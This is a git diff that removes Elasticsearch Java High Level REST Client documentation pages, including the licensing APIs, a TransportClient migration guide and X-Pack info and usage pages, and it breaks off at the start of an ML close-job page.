--git a/docs/java-rest/high-level/java-builders.asciidoc b/docs/java-rest/high-level/java-builders.asciidoc deleted file mode 100644 index 89f2de5fa9f..00000000000 --- a/docs/java-rest/high-level/java-builders.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[[java-rest-high-java-builders]] -== Using Java Builders - -The Java High Level REST Client depends on the Elasticsearch core project which provides -different types of Java `Builders` objects, including: - -Query Builders:: - -The query builders are used to create the query to execute within a search request. There -is a query builder for every type of query supported by the Query DSL. Each query builder -implements the `QueryBuilder` interface and allows to set the specific options for a given -type of query. Once created, the `QueryBuilder` object can be set as the query parameter of -`SearchSourceBuilder`. The <> -page shows an example of how to build a full search request using `SearchSourceBuilder` and -`QueryBuilder` objects. The <> page -gives a list of all available search queries with their corresponding `QueryBuilder` objects -and `QueryBuilders` helper methods. - -Aggregation Builders:: - -Similarly to query builders, the aggregation builders are used to create the aggregations to -compute during a search request execution. There is an aggregation builder for every type of -aggregation (or pipeline aggregation) supported by Elasticsearch. All builders extend the -`AggregationBuilder` class (or `PipelineAggregationBuilder`class). Once created, `AggregationBuilder` -objects can be set as the aggregation parameter of `SearchSourceBuilder`. There is a example -of how `AggregationBuilder` objects are used with `SearchSourceBuilder` objects to define the aggregations -to compute with a search query in <> page. -The <> page gives a list of all available -aggregations with their corresponding `AggregationBuilder` objects and `AggregationBuilders` helper methods. - -include::query-builders.asciidoc[] -include::aggs-builders.asciidoc[] diff --git a/docs/java-rest/high-level/licensing/delete-license.asciidoc b/docs/java-rest/high-level/licensing/delete-license.asciidoc deleted file mode 100644 index d9aec6e57a1..00000000000 --- a/docs/java-rest/high-level/licensing/delete-license.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ -[[java-rest-high-delete-license]] -=== Delete License - -[[java-rest-high-delete-license-execution]] -==== Execution - -The license can be deleted using the `deleteLicense()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[delete-license-execute] --------------------------------------------------- - -[[java-rest-high-delete-license-response]] -==== Response - -The returned `DeleteLicenseResponse` contains the `acknowledged` flag, which -returns true if the request was processed by all nodes. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[delete-license-response] --------------------------------------------------- -<1> Check the acknowledge flag. It should be true if license deletion is acknowledged. - -[[java-rest-high-delete-license-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[delete-license-execute-async] --------------------------------------------------- -<1> The `DeleteLicenseRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `DeleteLicenseResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[delete-license-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/licensing/get-basic-status.asciidoc b/docs/java-rest/high-level/licensing/get-basic-status.asciidoc deleted file mode 100644 index ffca094a592..00000000000 --- a/docs/java-rest/high-level/licensing/get-basic-status.asciidoc +++ /dev/null @@ -1,23 +0,0 @@ -[[java-rest-high-get-basic-status]] -=== Get Basic Status - -[[java-rest-high-get-basic-status-execution]] -==== Execution - -The basic status of the license can be retrieved as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-basic-status-execute] --------------------------------------------------- - -[[java-rest-high-get-basic-status-response]] -==== Response - -The returned `GetTrialStatusResponse` holds only a `boolean` flag: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-basic-status-response] --------------------------------------------------- -<1> Whether the license is eligible to start basic or not diff --git a/docs/java-rest/high-level/licensing/get-license.asciidoc b/docs/java-rest/high-level/licensing/get-license.asciidoc deleted file mode 100644 index 17eb89450fb..00000000000 --- a/docs/java-rest/high-level/licensing/get-license.asciidoc +++ /dev/null @@ -1,50 +0,0 @@ -[[java-rest-high-get-license]] -=== Get License - -[[java-rest-high-get-license-execution]] -==== Execution - -The license can be added or updated using the `getLicense()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-license-execute] --------------------------------------------------- - -[[java-rest-high-get-license-response]] -==== Response - -The returned `GetLicenseResponse` contains the license in the JSON format. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-license-response] --------------------------------------------------- -<1> The text of the license. - -[[java-rest-high-get-license-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-license-execute-async] --------------------------------------------------- -<1> The `GetLicenseRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `GetLicenseResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-license-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/licensing/get-trial-status.asciidoc b/docs/java-rest/high-level/licensing/get-trial-status.asciidoc deleted file mode 100644 index f117f9aa838..00000000000 --- a/docs/java-rest/high-level/licensing/get-trial-status.asciidoc +++ /dev/null @@ -1,23 +0,0 @@ -[[java-rest-high-get-trial-status]] -=== Get Trial Status - -[[java-rest-high-get-trial-status-execution]] -==== Execution - -The trial status of the license can be retrieved as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-trial-status-execute] --------------------------------------------------- - -[[java-rest-high-get-trial-status-response]] -==== Response - -The returned `GetTrialStatusResponse` holds only a `boolean` flag: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-trial-status-response] --------------------------------------------------- -<1> Whether the license is eligible to start trial or not diff --git a/docs/java-rest/high-level/licensing/put-license.asciidoc b/docs/java-rest/high-level/licensing/put-license.asciidoc deleted file mode 100644 index 945d447317b..00000000000 --- a/docs/java-rest/high-level/licensing/put-license.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ -[[java-rest-high-put-license]] -=== Update License - -[[java-rest-high-put-license-execution]] -==== Execution - -The license can be added or updated using the `putLicense()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[put-license-execute] --------------------------------------------------- -<1> Set the categories of information to retrieve. The default is to -return no information which is useful for checking if {xpack} is installed -but not much else. -<2> A JSON document containing the license information. - -[[java-rest-high-put-license-response]] -==== Response - -The returned `PutLicenseResponse` contains the `LicensesStatus`, -`acknowledged` flag and possible acknowledge messages. The acknowledge messages -are present if you previously had a license with more features than one you -are trying to update and you didn't set the `acknowledge` flag to `true`. In this case -you need to display the messages to the end user and if they agree, resubmit the -license with the `acknowledge` flag set to `true`. Please note that the request will -still return a 200 return code even if requires an acknowledgement. So, it is -necessary to check the `acknowledged` flag. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[put-license-response] --------------------------------------------------- -<1> The status of the license -<2> Make sure that the license is valid. -<3> Check the acknowledge flag. It should be true if license is acknowledged. -<4> Otherwise we can see the acknowledge messages in `acknowledgeHeader()` -<5> and check component-specific messages in `acknowledgeMessages()`. - -[[java-rest-high-put-license-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[put-license-execute-async] --------------------------------------------------- -<1> The `PutLicenseRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `PutLicenseResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[put-license-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/licensing/start-basic.asciidoc b/docs/java-rest/high-level/licensing/start-basic.asciidoc deleted file mode 100644 index 3ff50cfd2db..00000000000 --- a/docs/java-rest/high-level/licensing/start-basic.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ -[[java-rest-high-start-basic]] -=== Start Basic License - -[[java-rest-high-start-basic-execution]] -==== Execution - -This API creates and enables a basic license using the `startBasic()` method. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-basic-execute] --------------------------------------------------- - -[[java-rest-high-start-basic-response]] -==== Response - -The returned `StartBasicResponse` returns a field indicating whether the -basic was started. If it was started, the response returns a the type of -license started. If it was not started, it returns an error message describing -why. - -Acknowledgement messages may also be returned if this API was called without -the `acknowledge` flag set to `true`. In this case you need to display the -messages to the end user and if they agree, resubmit the request with the -`acknowledge` flag set to `true`. Please note that the response will still -return a 200 return code even if it requires an acknowledgement. So, it is -necessary to check the `acknowledged` flag. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-basic-response] --------------------------------------------------- -<1> Whether or not the request had the `acknowledge` flag set -<2> Whether or not this request caused a basic to start -<3> If this request did not cause a basic to start, a message explaining why -<4> If the user's request did not have the `acknowledge` flag set, a summary -of the user's acknowledgement required for this API -<5> If the user's request did not have the `acknowledge` flag set, contains -keys of commercial features and values of messages describing how they will -be affected by licensing changes as the result of starting a basic - -[[java-rest-high-start-basic-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-basic-execute-async] --------------------------------------------------- -<1> The `StartBasicResponse` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `StartBasicResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-basic-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/licensing/start-trial.asciidoc b/docs/java-rest/high-level/licensing/start-trial.asciidoc deleted file mode 100644 index 0f198a391f0..00000000000 --- a/docs/java-rest/high-level/licensing/start-trial.asciidoc +++ /dev/null @@ -1,70 +0,0 @@ -[[java-rest-high-start-trial]] -=== Start Trial - -[[java-rest-high-start-trial-execution]] -==== Execution - -This API creates and enables a trial license using the `startTrial()` -method. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-trial-execute] ---------------------------------------------------- -<1> Sets the "acknowledge" parameter to true, indicating the user has -acknowledged that starting a trial license may affect commercial features - -[[java-rest-high-start-trial-response]] -==== Response - -The returned `StartTrialResponse` returns a field indicating whether the -trial was started. If it was started, the response returns a the type of -license started. If it was not started, it returns an error message describing -why. - -Acknowledgement messages may also be returned if this API was called without -the `acknowledge` flag set to `true`. In this case you need to display the -messages to the end user and if they agree, resubmit the request with the -`acknowledge` flag set to `true`. Please note that the response will still -return a 200 return code even if it requires an acknowledgement. So, it is -necessary to check the `acknowledged` flag. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-trial-response] --------------------------------------------------- -<1> Whether or not the request had the `acknowledge` flag set -<2> Whether or not this request caused a trial to start -<3> If this request caused a trial to start, which type of license it -registered -<4> If this request did not cause a trial to start, a message explaining why -<5> If the user's request did not have the `acknowledge` flag set, a summary -of the user's acknowledgement required for this API -<6> If the user's request did not have the `acknowledge` flag set, contains -keys of commercial features and values of messages describing how they will -be affected by licensing changes as the result of starting a trial - -[[java-rest-high-start-trial-async]] -==== Asynchronous execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-trial-execute-async] --------------------------------------------------- - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `StartTrialResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-trial-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument \ No newline at end of file diff --git a/docs/java-rest/high-level/migration.asciidoc b/docs/java-rest/high-level/migration.asciidoc deleted file mode 100644 index c8db57f5259..00000000000 --- a/docs/java-rest/high-level/migration.asciidoc +++ /dev/null @@ -1,289 +0,0 @@ -[[java-rest-high-level-migration]] -== Migration Guide - -This section describes how to migrate existing code from the `TransportClient` -to the Java High Level REST Client released with the version 5.6.0 -of Elasticsearch. - -=== Motivations around a new Java client - -The existing `TransportClient` has been part of Elasticsearch since https://github.com/elastic/elasticsearch/blob/b3337c312765e51cec7bde5883bbc0a08f56fb65/modules/elasticsearch/src/main/java/org/elasticsearch/client/transport/TransportClient.java[its very first commit]. - It is a special client as it uses the transport protocol to communicate with Elasticsearch, - which causes compatibility problems if the client is not on the same version as the - Elasticsearch instances it talks to. - -We released a low-level REST client in 2016, which is based on the well known Apache HTTP -client and it allows to communicate with an Elasticsearch cluster in any version using HTTP. -On top of that we released the high-level REST client which is based on the low-level client -but takes care of request marshalling and response un-marshalling. - -If you're interested in knowing more about these changes, we wrote a blog post about the -https://www.elastic.co/blog/state-of-the-official-elasticsearch-java-clients[state of the official Elasticsearch Java clients]. - -=== Prerequisite - -The Java High Level Rest Client requires Java `1.8` and can be used to send requests -to an <>. - -=== How to migrate - -Adapting existing code to use the `RestHighLevelClient` instead of the `TransportClient` -requires the following steps: - -- Update dependencies -- Update client initialization -- Update application code - -=== Updating the dependencies - -Java application that uses the `TransportClient` depends on the -`org.elasticsearch.client:transport` artifact. This dependency -must be replaced by a new dependency on the high-level client. - -The <> page shows - typical configurations for Maven and Gradle and presents the - <> brought by the - high-level client. - -// This ID is bad but it is the one we've had forever. -[[_changing_the_client_8217_s_initialization_code]] -=== Changing the client's initialization code - -The `TransportClient` is typically initialized as follows: -[source,java] --------------------------------------------------- -Settings settings = Settings.builder() - .put("cluster.name", "prod").build(); - -TransportClient transportClient = new PreBuiltTransportClient(settings) - .addTransportAddress(new TransportAddress(InetAddress.getByName("localhost"), 9300)) - .addTransportAddress(new TransportAddress(InetAddress.getByName("localhost"), 9301)); --------------------------------------------------- - -The initialization of a `RestHighLevelClient` is different. It requires to provide -a <> as a constructor -argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[rest-high-level-client-init] --------------------------------------------------- - -NOTE: The `RestClient` uses Elasticsearch's HTTP service which is - bounded by default on `9200`. This port is different from the port - used to connect to Elasticsearch with a `TransportClient`. - -The `RestHighLevelClient` is thread-safe. It is typically instantiated by the -application at startup time or when the first request is executed. - -Once the `RestHighLevelClient` is initialized, it can be used to execute any -of the <>. - -As with the `TransportClient`, the `RestHighLevelClient` must be closed when it -is not needed anymore or when the application is stopped. - -The code that closes the `TransportClient`: - -[source,java] --------------------------------------------------- -transportClient.close(); --------------------------------------------------- - -must be replaced with: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[rest-high-level-client-close] --------------------------------------------------- - -// This ID is bad but it is the one we've had forever. -[[_changing_the_application_8217_s_code]] -=== Changing the application's code - -The `RestHighLevelClient` supports the same request and response objects -as the `TransportClient`, but exposes slightly different methods to -send the requests. - -More importantly, the high-level client: - -- does not support request builders. The legacy methods like -`client.prepareIndex()` must be changed to use - request constructors like `new IndexRequest()` to create requests - objects. The requests are then executed using synchronous or - asynchronous dedicated methods like `client.index()` or `client.indexAsync()`. - -==== How to migrate the way requests are built - -The Java API provides two ways to build a request: by using the request's constructor or by using -a request builder. Migrating from the `TransportClient` to the high-level client can be -straightforward if application's code uses the former, while changing usages of the latter can -require more work. - -[[java-rest-high-level-migration-request-ctor]] -===== With request constructors - -When request constructors are used, like in the following example: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MigrationDocumentationIT.java[migration-request-ctor] --------------------------------------------------- -<1> Create an `IndexRequest` using its constructor and id() setter. - -The migration is very simple. The execution using the `TransportClient`: - -[source,java] --------------------------------------------------- -IndexResponse response = transportClient.index(indexRequest).actionGet(); --------------------------------------------------- - -Can be easily replaced to use the `RestHighLevelClient`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MigrationDocumentationIT.java[migration-request-ctor-execution] --------------------------------------------------- - -[[java-rest-high-level-migration-request-builder]] -===== With request builders - -The Java API provides a request builder for every type of request. They are exposed by the -`TransportClient` through the many `prepare()` methods. Here are some examples: - -[source,java] --------------------------------------------------- -IndexRequestBuilder indexRequestBuilder = transportClient.prepareIndex(); // <1> -DeleteRequestBuilder deleteRequestBuilder = transportClient.prepareDelete(); // <2> -SearchRequestBuilder searchRequestBuilder = transportClient.prepareSearch(); // <3> --------------------------------------------------- -<1> Create a `IndexRequestBuilder` using the `prepareIndex()` method from the `TransportClient`. The -request builder encapsulates the `IndexRequest` to be executed. -<2> Create a `DeleteRequestBuilder` using the `prepareDelete()` method from the `TransportClient`. The -request builder encapsulates the `DeleteRequest` to be executed. -<3> Create a `SearchRequestBuilder` using the `prepareSearch()` method from the `TransportClient`. The -request builder encapsulates the `SearchRequest` to be executed. - -Since the Java High Level REST Client does not support request builders, applications that use -them must be changed to use <> instead. - -NOTE: While you are incrementally migrating your application and you have both the transport client -and the high level client available you can always get the `Request` object from the `Builder` object -by calling `Builder.request()`. We do not advise continuing to depend on the builders in the long run -but it should be possible to use them during the transition from the transport client to the high -level rest client. - -==== How to migrate the way requests are executed - -The `TransportClient` allows to execute requests in both synchronous and asynchronous ways. This is also -possible using the high-level client. - -===== Synchronous execution - -The following example shows how a `DeleteRequest` can be synchronously executed using the `TransportClient`: - -[source,java] --------------------------------------------------- -DeleteRequest request = new DeleteRequest("index", "doc", "id"); // <1> -DeleteResponse response = transportClient.delete(request).actionGet(); // <2> --------------------------------------------------- -<1> Create the `DeleteRequest` using its constructor -<2> Execute the `DeleteRequest`. The `actionGet()` method blocks until a -response is returned by the cluster. - -The same request synchronously executed using the high-level client is: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MigrationDocumentationIT.java[migration-request-sync-execution] --------------------------------------------------- -<1> Execute the `DeleteRequest`. The `delete()` method blocks until a -response is returned by the cluster. - -===== Asynchronous execution - -The following example shows how a `DeleteRequest` can be asynchronously executed using the `TransportClient`: - -[source,java] --------------------------------------------------- -DeleteRequest request = new DeleteRequest("index", "doc", "id"); // <1> -transportClient.delete(request, new ActionListener() { // <2> - @Override - public void onResponse(DeleteResponse deleteResponse) { - // <3> - } - - @Override - public void onFailure(Exception e) { - // <4> - } -}); --------------------------------------------------- -<1> Create the `DeleteRequest` using its constructor -<2> Execute the `DeleteRequest` by passing the request and a -`ActionListener` that gets called on execution completion or -failure. This method does not block and returns immediately. -<3> The `onResponse()` method is called when the response is -returned by the cluster. -<4> The `onFailure()` method is called when an error occurs -during the execution of the request. - -The same request asynchronously executed using the high-level client is: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MigrationDocumentationIT.java[migration-request-async-execution] --------------------------------------------------- -<1> Create the `DeleteRequest` using its constructor -<2> Execute the `DeleteRequest` by passing the request and a -`ActionListener` that gets called on execution completion or -failure. This method does not block and returns immediately. -<3> The `onResponse()` method is called when the response is -returned by the cluster. -<4> The `onFailure()` method is called when an error occurs -during the execution of the request. - -[[java-rest-high-level-migration-cluster-health]] -==== Checking Cluster Health using the Low-Level REST Client - -Another common need is to check the cluster's health using the Cluster API. With -the `TransportClient` it can be done this way: - -[source,java] --------------------------------------------------- -ClusterHealthResponse response = client.admin().cluster().prepareHealth().get(); // <1> - -ClusterHealthStatus healthStatus = response.getStatus(); // <2> -if (healthStatus != ClusterHealthStatus.GREEN) { - // <3> -} --------------------------------------------------- -<1> Execute a `ClusterHealth` with default parameters -<2> Retrieve the cluster's health status from the response -<3> Handle the situation where the cluster's health is not green - -With the low-level client, the code can be changed to: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MigrationDocumentationIT.java[migration-cluster-health] --------------------------------------------------- -<1> Set up the request to wait for the cluster's health to become green if it isn't already. -<2> Make the request and the get back a `Response` object. -<3> Retrieve an `InputStream` object in order to read the response's content -<4> Parse the response's content using Elasticsearch's helper class `XContentHelper`. This - helper requires the content type of the response to be passed as an argument and returns - a `Map` of objects. Values in the map can be of any type, including inner `Map` that are - used to represent the JSON object hierarchy. -<5> Retrieve the value of the `status` field in the response map, casts it as a `String` -object and use the `ClusterHealthStatus.fromString()` method to convert it as a `ClusterHealthStatus` -object. This method throws an exception if the value does not corresponds to a valid cluster -health status. -<6> Handle the situation where the cluster's health is not green - -Note that for convenience this example uses Elasticsearch's helpers to parse the JSON response -body, but any other JSON parser could have been use instead. - -=== Provide feedback - -We love to hear from you! Please give us your feedback about your migration -experience and how to improve the Java High Level Rest Client on https://discuss.elastic.co/[our forum]. diff --git a/docs/java-rest/high-level/migration/get-deprecation-info.asciidoc b/docs/java-rest/high-level/migration/get-deprecation-info.asciidoc deleted file mode 100644 index 3cda1c2f503..00000000000 --- a/docs/java-rest/high-level/migration/get-deprecation-info.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: get-deprecation-info -:request: DeprecationInfoRequest -:response: DeprecationInfoResponse --- - -[id="{upid}-{api}"] -=== Get Deprecation Info - -[id="{upid}-{api}-request"] -==== Get Deprecation Info Request - -A +{request}+ can be applied to one or more indices: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Create a new request instance - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Deprecation Info Response - -The returned +{response}+ contains information about deprecated features currently -in use at the cluster, node, and index level. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> a List of Cluster deprecations -<2> a List of Node deprecations -<3> a Map of key IndexName, value List of deprecations for the index -<4> a list of Machine Learning related deprecations diff --git a/docs/java-rest/high-level/miscellaneous/main.asciidoc b/docs/java-rest/high-level/miscellaneous/main.asciidoc deleted file mode 100644 index 635fe6f3b99..00000000000 --- a/docs/java-rest/high-level/miscellaneous/main.asciidoc +++ /dev/null @@ -1,22 +0,0 @@ -[[java-rest-high-main]] -=== Info API - -[[java-rest-high-main-request]] -==== Execution - -Cluster information can be retrieved using the `info()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[main-execute] --------------------------------------------------- - -[[java-rest-high-main-response]] -==== Response - -The returned `MainResponse` provides various kinds of information about the cluster: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[main-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/miscellaneous/ping.asciidoc b/docs/java-rest/high-level/miscellaneous/ping.asciidoc deleted file mode 100644 index 6cff46a62c5..00000000000 --- a/docs/java-rest/high-level/miscellaneous/ping.asciidoc +++ /dev/null @@ -1,13 +0,0 @@ -[[java-rest-high-ping]] -=== Ping API - -[[java-rest-high-ping-request]] -==== Execution - -The `ping()` method checks if the cluster is up and available to -process requests and returns a boolean: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[ping-execute] --------------------------------------------------- diff --git a/docs/java-rest/high-level/miscellaneous/x-pack-info.asciidoc b/docs/java-rest/high-level/miscellaneous/x-pack-info.asciidoc deleted file mode 100644 index b432b10d3b8..00000000000 --- a/docs/java-rest/high-level/miscellaneous/x-pack-info.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ -[[java-rest-high-x-pack-info]] -=== X-Pack Info API - -[[java-rest-high-x-pack-info-execution]] -==== Execution - -General information about the installed {xpack} features can be retrieved -using the `xPackInfo()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-info-execute] --------------------------------------------------- -<1> Enable verbose mode. The default is `false` but `true` will return -more information. -<2> Set the categories of information to retrieve. The default is to -return no information which is useful for checking if {xpack} is installed -but not much else. - -[[java-rest-high-x-pack-info-response]] -==== Response - -The returned `XPackInfoResponse` can contain `BuildInfo`, `LicenseInfo`, -and `FeatureSetsInfo` depending on the categories requested. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-info-response] --------------------------------------------------- -<1> `BuildInfo` contains the commit hash from which Elasticsearch was -built and the timestamp that the x-pack module was created. -<2> `LicenseInfo` contains the type of license that the cluster is using -and its expiration date. -<3> Basic licenses do not expire and will return this constant. -<4> `FeatureSetsInfo` contains a `Map` from the name of a feature to -information about a feature like whether or not it is available under -the current license. - -[[java-rest-high-x-pack-info-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-info-execute-async] --------------------------------------------------- -<1> The `XPackInfoRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `XPackInfoResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-info-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/miscellaneous/x-pack-usage.asciidoc b/docs/java-rest/high-level/miscellaneous/x-pack-usage.asciidoc deleted file mode 100644 index c1e5ccf13e2..00000000000 --- a/docs/java-rest/high-level/miscellaneous/x-pack-usage.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[[java-rest-high-x-pack-usage]] -=== X-Pack Usage API - -[[java-rest-high-x-pack-usage-execution]] -==== Execution - -Detailed information about the usage of features from {xpack} can be -retrieved using the `usage()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-usage-execute] --------------------------------------------------- - -[[java-rest-high-x-pack-usage-response]] -==== Response - -The returned `XPackUsageResponse` contains a `Map` keyed by feature name. -Every feature map has an `available` key, indicating whether that -feature is available given the current license, and an `enabled` key, -indicating whether that feature is currently enabled. Other keys -are specific to each feature. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-usage-response] --------------------------------------------------- - -[[java-rest-high-x-pack-usage-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-usage-execute-async] --------------------------------------------------- -<1> The call to execute the usage api and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `XPackUsageResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-usage-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/ml/close-job.asciidoc b/docs/java-rest/high-level/ml/close-job.asciidoc deleted file mode 100644 index 83798b591c2..00000000000 --- a/docs/java-rest/high-level/ml/close-job.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: close-job -:request: CloseJobRequest -:response: CloseJobResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Close {anomaly-jobs} API - -Closes {anomaly-jobs} in the cluster. It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Close {anomaly-jobs} request - -A +{request}+ object gets created with an existing non-null `jobId`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- 